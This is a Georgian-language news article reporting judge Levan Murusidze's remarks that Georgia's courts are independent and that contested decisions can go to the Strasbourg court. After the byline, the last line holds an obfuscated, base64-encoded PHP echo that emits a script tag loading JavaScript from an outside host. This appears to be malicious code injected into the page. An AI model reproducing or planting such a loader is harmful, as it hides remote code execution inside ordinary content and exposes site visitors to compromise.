gorgia
ავერსი jaluzi

„საქართველოში არსებობს დამოუკიდებელი სასამართლო და არავის სამართალი არ დაეკარგება“ - ამის შესახებ სააპელაციო სასამართლოს მოსამართლემ და იუსტიციის უმაღლესი საბჭოს წევრმა, ლევან მურუსიძემ განაცხადა.

მურუსიძემ აღნიშნული განცხადება გააკეთა მოსამართლეთა კონფერენციის პარალელურად გამართული აქციების შესახებ ჟურნალისტის შეკითხვაზე, რომელიც დაკავებულთა მშობლების მიერ გამართულ საპროტესტო აქციას ეხებოდა.

მისი თქმით, საქმეზე კონკრეტული კომენტარის გაკეთება არ შეუძლია, რადგან საქმეები ან გამოძიების ეტაპზეა, ან სასამართლო განხილვის პროცესში იმყოფება. ასევე, აღნიშნა, რომ საქმის მასალები არ აქვს, და ვერც ექნებოდა უფლება, დეტალურ კომენტარზე წასულიყო.

„ეს კონკრეტული სისხლის სამართლის საქმეებია - ზოგი გამოძიების ეტაპზეა, ზოგი, ალბათ, უკვე სასამართლოში განიხილება. მით უმეტეს, როცა საქმის მასალებს არ ვიცნობ, ამაზე კომენტარის გაკეთება ჩემთვის შეუძლებელია. ერთი რამ შემიძლია ვთქვა - საქართველოში არის დამოუკიდებელი სასამართლო და არავის სამართალი არ დაეკარგება. აღნიშნული საქმეები განიხილება სამივე ინსტანციაში, ხოლო საბოლოოდ არსებობს სტრასბურგის სასამართლოც. ყველანი ერთად ვნახავთ, რამდენად ჩააბარებს ქართული მართლმსაჯულება ამ ტესტს“, - განაცხადა მურუსიძემ.

ჟურნალისტის კითხვაზე, იყო თუ არა საკმარისი მტკიცებულებები სასამართლოს მიერ მიღებულ გადაწყვეტილებებში, მურუსიძემ აღნიშნა, რომ მას არ აქვს უფლება, სხვა მოსამართლის საქმიანობა შეაფასოს.

„მე არ მაქვს უფლება, სხვა მოსამართლის გადაწყვეტილება შევაფასო. არც საქმის მასალები ვიცი. მაგრამ თუ მოსამართლემ მიიჩნია, რომ კონკრეტული გადაწყვეტილება უნდა მიეღო, ეს უკვე მის პასუხისმგებლობაზეა. არსებობს დასაბუთება და, თუ ვინმეს ეჭვი აქვს, გზა ღიაა - მიმართონ სტრასბურგის სასამართლოს და დაველოდოთ მის პასუხს. დარწმუნებული ვარ, მიღებული გადაწყვეტილებები კანონზე და მტკიცებულებებზე დაყრდნობით არის მიღებული“, - განაცხადა მურუსიძემ.

ავტორი
მირანდა შურღაია
162
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");